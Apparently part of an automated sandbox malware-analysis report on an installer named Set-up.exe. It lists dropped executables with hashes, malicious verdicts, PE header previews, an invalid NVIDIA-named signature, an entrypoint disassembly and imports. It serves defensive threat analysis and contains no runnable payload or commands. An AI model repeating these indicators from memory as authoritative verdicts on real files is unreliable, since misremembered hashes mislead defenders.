                                                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ColorStreamLib\is-1H7IE.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):0.4845359981692001
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                                                                                                                            • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                                                                                                                            • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                            File name:Set-up.exe
                                                                                                                                                                                                                                                            File size:74'868'247 bytes
                                                                                                                                                                                                                                                            MD5:956e50e278acbf39dfca43e8ba78f112
                                                                                                                                                                                                                                                            SHA1:50d818804b27bfa3ad79a469f0f93d08e3d09b9c
                                                                                                                                                                                                                                                            SHA256:caa52bf06d55953df9dba864dcc718170f4598e217e6f949c909d59b19d74a02
                                                                                                                                                                                                                                                            SHA512:5f0a561a9ca4581613e0c28c7c7205e3c4a4938f87dec07684136e9842ec5cfdcb994860d3ba953af0520366ad1bc7ac8903cd2a7a857f2d83447d6d94b24fa6
                                                                                                                                                                                                                                                            SSDEEP:24576:xnbbPImeK4brDi4IxgRqzwqNb+Yz73P2EMZbG0JEtdqxytSGs4UhtcjAuwSV:xHwKh4nqzF3PYdStowTugA
                                                                                                                                                                                                                                                            TLSH:5FF7E52DB75302F2FB533AB94D17D3DCA92FA110332014DB659E06CE9E129D85632F6A
                                                                                                                                                                                                                                                            File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                                            Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Entrypoint:0x5025d8
                                                                                                                                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:f62b90e31eca404f228fcf7068b00f31

                                                                                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                                            Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                                                            • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                                            • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                                            Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                                                                                                                                                            Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                                                                                                                                                            Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                                                                                                                                                            Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                            add esp, FFFFFFF0h
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                                            mov eax, 00500930h
                                                                                                                                                                                                                                                            call 00007F59545E3D16h
                                                                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov ebx, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            call 00007F59545E4BC1h
                                                                                                                                                                                                                                                            and eax, FFFFFF7Fh
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            call 00007F59545E4E16h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            push 00502653h
                                                                                                                                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                                                                                            call 00007F59545E4561h
                                                                                                                                                                                                                                                            call 00007F59546DB3FCh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00500568h]
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            push 005005CCh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            call 00007F59546571EDh
                                                                                                                                                                                                                                                            call 00007F59546DB450h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            mov dword ptr fs:[eax], edx
                                                                                                                                                                                                                                                            jmp 00007F59546DD3CBh
                                                                                                                                                                                                                                                            jmp 00007F59545DF43Dh
                                                                                                                                                                                                                                                            call 00007F59546DB1CCh
                                                                                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                                                                                            call 00007F59545DFEFEh
                                                                                                                                                                                                                                                            call 00007F59545DF881h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov edx, 005027E8h
                                                                                                                                                                                                                                                            call 00007F5954656CF8h
                                                                                                                                                                                                                                                            push 00000005h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            call 00007F59545E4DD7h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov edx, dword ptr [004DACA0h]

                                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x10e0000x3840.idata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1140000x70000.rsrc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x4762c570x39c0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x1130000x18.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10ea800x88c.idata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                            .text0x10000xffdc80xffe00fd1e55adfdbdbab67ae463c2a2fa8ed0False0.4829724138983879data6.485045957248534IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .itext0x1010000x17f40x18008e0d52126a75001416d71c23878be2c1False0.5244140625data6.003729381717893IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .data0x1030000x308c0x3200c2acc8e96fc244753abd1d87bb624bc0False0.425078125data4.3575606000501415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .bss0x1070000x61980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .idata0x10e0000x38400x3a000e1e8128f777a5ff18a144305a4fb39cFalse0.3108836206896552data5.2048781278956655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .tls0x1120000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .rdata0x1130000x180x2009cf98ea6bb17a35d99fa770a2e9a8ff0False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .rsrc0x1140000x700000x70000aa2b7a7d8003a5b34a511f36903a9fb1False0.5853162493024554data7.360269965698417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                            RT_CURSOR0x114c440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                            RT_CURSOR0x114d780x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                                                            RT_CURSOR0x114eac0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                            RT_CURSOR0x114fe00x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                                                            RT_CURSOR0x1151140x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                                                            RT_CURSOR0x1152480x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                                                            RT_CURSOR0x11537c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                            RT_BITMAP0x1154b00x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                                                                                                                                                                            RT_BITMAP0x1159980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                                                                                                                                                                            RT_ICON0x115a800x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                                                                                                                                                                            RT_ICON0x115ba80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                                                                                                                                                                            RT_ICON0x1161100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                                                                                                                                                                            RT_ICON0x1163f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                                                                                                                                                                            RT_STRING0x116ca00xecdata0.6059322033898306
                                                                                                                                                                                                                                                            RT_STRING0x116d8c0x250data0.47466216216216217
                                                                                                                                                                                                                                                            RT_STRING0x116fdc0x28cdata0.4647239263803681
                                                                                                                                                                                                                                                            RT_STRING0x1172680x3e4data0.4347389558232932
                                                                                                                                                                                                                                                            RT_STRING0x11764c0x9cdata0.717948717948718
                                                                                                                                                                                                                                                            RT_STRING0x1176e80xe8data0.6293103448275862
                                                                                                                                                                                                                                                            RT_STRING0x1177d00x468data0.3820921985815603
                                                                                                                                                                                                                                                            RT_STRING0x117c380x38cdata0.3898678414096916
                                                                                                                                                                                                                                                            RT_STRING0x117fc40x3dcdata0.39271255060728744
                                                                                                                                                                                                                                                            RT_STRING0x1183a00x360data0.37037037037037035
                                                                                                                                                                                                                                                            RT_STRING0x1187000x40cdata0.3783783783783784
                                                                                                                                                                                                                                                            RT_STRING0x118b0c0x108data0.5113636363636364
                                                                                                                                                                                                                                                            RT_STRING0x118c140xccdata0.6029411764705882
                                                                                                                                                                                                                                                            RT_STRING0x118ce00x234data0.5070921985815603
                                                                                                                                                                                                                                                            RT_STRING0x118f140x3c8data0.3181818181818182
                                                                                                                                                                                                                                                            RT_STRING0x1192dc0x32cdata0.43349753694581283
                                                                                                                                                                                                                                                            RT_STRING0x1196080x2a0data0.41964285714285715
                                                                                                                                                                                                                                                            RT_RCDATA0x1198a80x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                                                                                                                                            RT_RCDATA0x121b900x10data1.5
                                                                                                                                                                                                                                                            RT_RCDATA0x121ba00x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                                                                                                            RT_RCDATA0x1233a00x6bcdata0.6467517401392111
                                                                                                                                                                                                                                                            RT_RCDATA0x123a5c0x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                                                                                                                                                                            RT_RCDATA0x12956c0x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                                                                                                                                                                            RT_RCDATA0x1296940x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                                                                                                                                                                            RT_RCDATA0x129a380x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                                                                                                                                                                            RT_RCDATA0x129d580x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                                                                                                                                                                            RT_RCDATA0x12a0580x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                                                                                                                                                                            RT_RCDATA0x12a6340x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                                                                                                                                            RT_RCDATA0x12aa980x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb7c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cba40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_ICON0x12cbb80x3edataEnglishUnited States0.8387096774193549
                                                                                                                                                                                                                                                            RT_VERSION0x12cbf80x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                                                                                                                                            RT_MANIFEST0x12cd540x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                                                            advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                                                                                                                            user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                                                                                                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                                                                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
